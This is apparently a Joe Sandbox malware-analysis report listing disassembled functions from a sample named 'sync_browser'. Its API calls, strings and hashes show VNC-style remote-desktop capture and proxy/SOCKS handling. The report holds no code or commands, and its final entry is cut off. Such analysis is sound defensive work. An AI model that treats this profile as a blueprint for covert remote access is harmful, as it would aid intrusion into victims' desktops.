Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
API String ID: 3609861302-2295524587
Opcode ID: 3f40f81f9f9a56da4334a47dd5e2ac96c2d3be7c17f7bfc7589bc4b69e0d4aab
Instruction ID: 8262f9d82adb954ab1931c23dcf1d418ed87a41778f03aa7dee9c367210464e5
Opcode Fuzzy Hash: 3f40f81f9f9a56da4334a47dd5e2ac96c2d3be7c17f7bfc7589bc4b69e0d4aab
Instruction Fuzzy Hash: 1AA18F23F39A8245FE559B64D8502B96298AF74B84F480935FA0DDB7E5EF3CE849C340

Function 00007FF67E7EF040 Relevance: 35.2, APIs: 5, Strings: 15, Instructions: 207threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E82A5B0: GetCurrentThreadId.KERNEL32 ref: 00007FF67E82A5E1
Part of subcall function 00007FF67E82A5B0: GetThreadDesktop.USER32 ref: 00007FF67E82A5E9
Part of subcall function 00007FF67E82A5B0: OpenInputDesktop.USER32 ref: 00007FF67E82A5FC

GetCurrentThreadId.KERNEL32 ref: 00007FF67E7EF15A
GetThreadDesktop.USER32 ref: 00007FF67E7EF162
GetUserObjectInformationA.USER32 ref: 00007FF67E7EF185

Part of subcall function 00007FF67E82A4A0: OpenDesktopA.USER32 ref: 00007FF67E82A4ED

DeleteObject.GDI32 ref: 00007FF67E7EF2F7
InvalidateRect.USER32 ref: 00007FF67E7EF330

Strings

vncdesktop.cpp : Break log, xrefs: 00007FF67E7EF21C
vncdesktop.cpp : InitVideo driver Called, xrefs: 00007FF67E7EF0C0
vncdesktop.cpp : InitBitmap Failed, xrefs: 00007FF67E7EF242
vncdesktop.cpp : SetPalette Failed, xrefs: 00007FF67E7EF3A1
vncdesktop.cpp : EnableOptimisedBlits Failed, xrefs: 00007FF67E7EF2AD
vncdesktop.cpp : Driver option enabled , xrefs: 00007FF67E7EF14E
vncdesktop.cpp : Removing real Dib buffer and replace by driver communication buffer, xrefs: 00007FF67E7EF2D3
vncdesktop.cpp : ThunkBitmapInfo Failed, xrefs: 00007FF67E7EF25A
vncdesktop.cpp : Driver option disabled , xrefs: 00007FF67E7EF1E8
vncdesktop.cpp : no default desktop , xrefs: 00007FF67E7EF1C4
vncdesktop.cpp : SetPixShift Failed, xrefs: 00007FF67E7EF378
vncdesktop.cpp : InitDesktop..., xrefs: 00007FF67E7EF06D
Default, xrefs: 00007FF67E7EF197
vncdesktop.cpp : SetPixFormat Failed, xrefs: 00007FF67E7EF34D
vncdesktop.cpp : InitDesktop Failed, xrefs: 00007FF67E7EF0A0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopThread$CurrentObjectOpen$DeleteInformationInputInvalidateRectUser
String ID: Default$vncdesktop.cpp : Break log$vncdesktop.cpp : Driver option disabled $vncdesktop.cpp : Driver option enabled $vncdesktop.cpp : EnableOptimisedBlits Failed$vncdesktop.cpp : InitBitmap Failed$vncdesktop.cpp : InitDesktop Failed$vncdesktop.cpp : InitDesktop...$vncdesktop.cpp : InitVideo driver Called$vncdesktop.cpp : Removing real Dib buffer and replace by driver communication buffer$vncdesktop.cpp : SetPalette Failed$vncdesktop.cpp : SetPixFormat Failed$vncdesktop.cpp : SetPixShift Failed$vncdesktop.cpp : ThunkBitmapInfo Failed$vncdesktop.cpp : no default desktop
API String ID: 421987145-2663527212
Opcode ID: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
Instruction ID: d14437757260ec738ddbbdafc346639eb57acd28184a2f417d2835addbdc7f20
Opcode Fuzzy Hash: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
Instruction Fuzzy Hash: 3CA16937A28A8791EB54DF64E4442F96365EFA4B08F944032E90ECB695DF3CE54DC340

Function 00007FF67E7CCF80 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 254libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E7CCFD1
GetProcAddress.KERNEL32 ref: 00007FF67E7CCFE9
FreeLibrary.KERNEL32 ref: 00007FF67E7CD00C
GlobalFree.KERNEL32 ref: 00007FF67E7CD01C
GlobalFree.KERNEL32 ref: 00007FF67E7CD02C
WideCharToMultiByte.KERNEL32 ref: 00007FF67E7CD06A
GlobalFree.KERNEL32 ref: 00007FF67E7CD075
swscanf.LIBCMT ref: 00007FF67E7CD263
swscanf.LIBCMT ref: 00007FF67E7CD2F7
swscanf.LIBCMT ref: 00007FF67E7CD307

Strings

P, xrefs: 00007FF67E7CD221
http=, xrefs: 00007FF67E7CD0B2, 00007FF67E7CD176
443, xrefs: 00007FF67E7CD328, 00007FF67E7CD33B
https=, xrefs: 00007FF67E7CD0EE, 00007FF67E7CD1AE
WinHttpGetIEProxyConfigForCurrentUser, xrefs: 00007FF67E7CCFDF
winhttp.dll, xrefs: 00007FF67E7CCFC8

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Free$Globalswscanf$Library$AddressByteCharLoadMultiProcWide
String ID: 443$P$WinHttpGetIEProxyConfigForCurrentUser$http=$https=$winhttp.dll
API String ID: 3955186772-955988753
Opcode ID: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
Instruction ID: dc805fd024677c49ee0864c534ce52885d7f15d4b4b678565d5a4444c8e7f796
Opcode Fuzzy Hash: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
Instruction Fuzzy Hash: BFB1D123B2CA8285EB10CB64E4803B9A7A9EF65794F544235FA5D87AE5DF7CD10EC300

Function 00007FF67E88844C Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 206COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF67E88849D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67E8884A8
_wsopen_s.LIBCMT ref: 00007FF67E8886B9

Strings

UTF-8, xrefs: 00007FF67E888625
a, xrefs: 00007FF67E88848E
, xrefs: 00007FF67E888620
, xrefs: 00007FF67E888695
r, xrefs: 00007FF67E888493
=, xrefs: 00007FF67E888614
w, xrefs: 00007FF67E888498
ccs, xrefs: 00007FF67E8885E9
UNICODE, xrefs: 00007FF67E88866B
UTF-16LE, xrefs: 00007FF67E888648
, xrefs: 00007FF67E8885E4
, xrefs: 00007FF67E888489
, xrefs: 00007FF67E88860F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo_wsopen_s
String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
API String ID: 2053332431-1561892669
Opcode ID: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
Instruction ID: 2977e13e0e442994f402b45ba0e4ef309ae72d2cf7d9dfeeca79654d0172467c
Opcode Fuzzy Hash: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
Instruction Fuzzy Hash: 4071C2A3E3C20645FB754B65AA08739DAC16F31744F985032FE4ECE5D6DE3CE9488601

Function 00007FF67E7D44B0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 195windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF67E7D44FF
SetDlgItemTextA.USER32 ref: 00007FF67E7D459D
SendDlgItemMessageA.USER32 ref: 00007FF67E7D45E1
SendDlgItemMessageA.USER32 ref: 00007FF67E7D4608
_snprintf.LIBCMT ref: 00007FF67E7D464F
SendDlgItemMessageA.USER32 ref: 00007FF67E7D466F
SendDlgItemMessageA.USER32 ref: 00007FF67E7D468B
SendDlgItemMessageA.USER32 ref: 00007FF67E7D46BB
SendDlgItemMessageA.USER32 ref: 00007FF67E7D46E0
_snprintf.LIBCMT ref: 00007FF67E7D4731
SendDlgItemMessageA.USER32 ref: 00007FF67E7D4751
GetDlgItem.USER32 ref: 00007FF67E7D477F
GetScrollInfo.USER32 ref: 00007FF67E7D4791
SendDlgItemMessageA.USER32 ref: 00007FF67E7D47CA

Strings

MS Sans Serif, xrefs: 00007FF67E7D461D, 00007FF67E7D46F8
<%s>: , xrefs: 00007FF67E7D4640

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Item$MessageSend$_snprintf$InfoScrollText
String ID: <%s>: $MS Sans Serif
API String ID: 1140286628-959951747
Opcode ID: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
Instruction ID: 2a00b9ff5313f01d6609ff8a4bf3f26949d676350dc1870e6c579952204b3e0a
Opcode Fuzzy Hash: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
Instruction Fuzzy Hash: BC919167F24A5286F710CF65E8016A973A0FBA8B98F104135EE4D97B68DF3CD599C300

Function 00007FF67E7E00F0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 123COMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00007FF67E7E014B
getpeername.WS2_32 ref: 00007FF67E7E0191
free.LIBCMT ref: 00007FF67E7E01E2
free.LIBCMT ref: 00007FF67E7E01DA

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

inet_ntoa.WS2_32 ref: 00007FF67E7E019B

Part of subcall function 00007FF67E879700: _errno.LIBCMT ref: 00007FF67E879712
Part of subcall function 00007FF67E879700: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E87971D

inet_ntoa.WS2_32 ref: 00007FF67E7E0155

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

getsockname.WS2_32 ref: 00007FF67E7E022C
inet_ntoa.WS2_32 ref: 00007FF67E7E0236
getpeername.WS2_32 ref: 00007FF67E7E0272
inet_ntoa.WS2_32 ref: 00007FF67E7E027C
free.LIBCMT ref: 00007FF67E7E02B3
free.LIBCMT ref: 00007FF67E7E02BB

Strings

vncclient.cpp : loopback connection attempted - client accepted, xrefs: 00007FF67E7E02C4
vncclient.cpp : loopback connection attempted - client rejected, xrefs: 00007FF67E7E01EF
Local loop-back connections are disabled., xrefs: 00007FF67E7E0204
<unavailable>, xrefs: 00007FF67E7E015B, 00007FF67E7E023C

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: freeinet_ntoa$_errnogetpeernamegetsockname$ErrorFreeHeapLast_invalid_parameter_noinfomalloc
String ID: <unavailable>$Local loop-back connections are disabled.$vncclient.cpp : loopback connection attempted - client accepted$vncclient.cpp : loopback connection attempted - client rejected
API String ID: 3199031719-36275550
Opcode ID: 09f765770764a639719d3cf357c971adc31c53d60d100ab1d863cd32f48191e7
Instruction ID: 1ba5e74bfc41c6a344ba6b0c1fb3fe382480b2378bd7279c3e9894a32023ad7a
Opcode Fuzzy Hash: 09f765770764a639719d3cf357c971adc31c53d60d100ab1d863cd32f48191e7
Instruction Fuzzy Hash: C7519023B28B4286EB95DF65E8442B9A3A4FF98B84F440135FA4E87765DF3CE549C700

Function 00007FF67E8823D8 Relevance: 27.2, APIs: 18, Instructions: 236COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF67E88241C
_errno.LIBCMT ref: 00007FF67E882423
__doserrno.LIBCMT ref: 00007FF67E882446
_errno.LIBCMT ref: 00007FF67E88244D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67E882755

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: __doserrno_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2315031519-0
Opcode ID: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
Instruction ID: 2e36c95cb5b08ac319e25aa2b04452fd595caf22bdbc0baed421ec398b65cd82
Opcode Fuzzy Hash: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
Instruction Fuzzy Hash: 62B16D33A2865286E7649F55E54013EF7A0FBA4B50F504136FB9D83A94EF7CE468CB10

Function 00007FF67E82A5B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 117threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF67E82A5E1
GetThreadDesktop.USER32 ref: 00007FF67E82A5E9
OpenInputDesktop.USER32 ref: 00007FF67E82A5FC
GetLastError.KERNEL32 ref: 00007FF67E82A61A
GetUserObjectInformationA.USER32 ref: 00007FF67E82A68D
CloseDesktop.USER32 ref: 00007FF67E82A69A

Strings

vncservice.cpp : !GetUserObjectInformation(inputdesktop, xrefs: 00007FF67E82A724
vncservice.cpp : threadname, inputname differ, xrefs: 00007FF67E82A777
vncservice.cpp : OpenInputDesktop II, xrefs: 00007FF67E82A652
vncservice.cpp : OpenInputDesktop %i I, xrefs: 00007FF67E82A620
vncservice.cpp : !GetUserObjectInformation(threaddesktop, xrefs: 00007FF67E82A6B9
vncservice.cpp : failed to close input desktop, xrefs: 00007FF67E82A6A4, 00007FF67E82A70F, 00007FF67E82A737

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
API String ID: 55935355-432259686
Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
Instruction ID: 5ae7b1290d6f5bed69bb96ecc77ef3a3445e106ad1d72cd4f57610ef67d12e16
Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
Instruction Fuzzy Hash: 83518163E2CB8395FB10DB65A8481B9A3A9AFB4744F504172F94EC66A4EF3CE44DC700

Function 00007FF67E7FBF40 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202windowCOMMON

Download Yara Rule

APIs

GetIconInfo.USER32 ref: 00007FF67E7FBF9D
DeleteObject.GDI32 ref: 00007FF67E7FBFF6

Strings

vncencoderCursor.cpp : GetBitmapBits() failed., xrefs: 00007FF67E7FC0AF
vncencoderCursor.cpp : cursor bitmap handle is NULL., xrefs: 00007FF67E7FC008
vncencoderCursor.cpp : GetObject() for bitmap failed., xrefs: 00007FF67E7FC035
vncencoderCursor.cpp : incorrect data in cursor bitmap., xrefs: 00007FF67E7FC262
vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed., xrefs: 00007FF67E7FC1DA
vncencoderCursor.cpp : cursor handle is NULL., xrefs: 00007FF67E7FBF8D
vncencoderCursor.cpp : GetIconInfo() failed., xrefs: 00007FF67E7FBFA7

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteIconInfoObject
String ID: vncencoderCursor.cpp : GetBitmapBits() failed.$vncencoderCursor.cpp : GetIconInfo() failed.$vncencoderCursor.cpp : GetObject() for bitmap failed.$vncencoderCursor.cpp : cursor bitmap handle is NULL.$vncencoderCursor.cpp : cursor handle is NULL.$vncencoderCursor.cpp : incorrect data in cursor bitmap.$vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed.
API String ID: 2689914137-3853778978
Opcode ID: 91b6d7ff33d2ce0a44b6c8591e5014cb7464b3371a937ef77d40afe3fa9690e2
Instruction ID: 3c9b3aba8d7844d79adb348d278eb9f9de0a4048676043f8d194bea96dbc77b7
Opcode Fuzzy Hash: 91b6d7ff33d2ce0a44b6c8591e5014cb7464b3371a937ef77d40afe3fa9690e2
Instruction Fuzzy Hash: 33917273B2868289E720DF65E4403B963A4FBA4788F404935EE4DD7A95DF3CE54ACB04

Function 00007FF67E7EF420 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 157windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32 ref: 00007FF67E7EF467
ReleaseDC.USER32 ref: 00007FF67E7EF488
DeleteDC.GDI32 ref: 00007FF67E7EF4AE
DeleteDC.GDI32 ref: 00007FF67E7EF4C7
DeleteObject.GDI32 ref: 00007FF67E7EF4F9
DeleteObject.GDI32 ref: 00007FF67E7EF532
DeleteObject.GDI32 ref: 00007FF67E7EF54B
CloseDesktop.USER32 ref: 00007FF67E7EF599

Strings

vncdesktop.cpp : failed to DeleteObject, xrefs: 00007FF67E7EF503
vncdesktopsink.cpp : ShutdownInitWindowthread , xrefs: 00007FF67E7EF433
vncdesktop.cpp : delete ((RGBPixelList) , xrefs: 00007FF67E7EF646
vncdesktop.cpp : failed to close desktop, xrefs: 00007FF67E7EF5A3
vncdesktop.cpp : failed to DeleteDC hmemdc, xrefs: 00007FF67E7EF4D1
vncdesktop.cpp : failed to DeleteDC hrootdc, xrefs: 00007FF67E7EF492

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Delete$Object$CloseDesktopMessagePostRelease
String ID: vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hmemdc$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to DeleteObject$vncdesktop.cpp : failed to close desktop$vncdesktopsink.cpp : ShutdownInitWindowthread
API String ID: 4267955742-668190334
Opcode ID: 1fcc153e8b0560ce5d91f32efa035b23564a634793fcca770c423c182836b27c
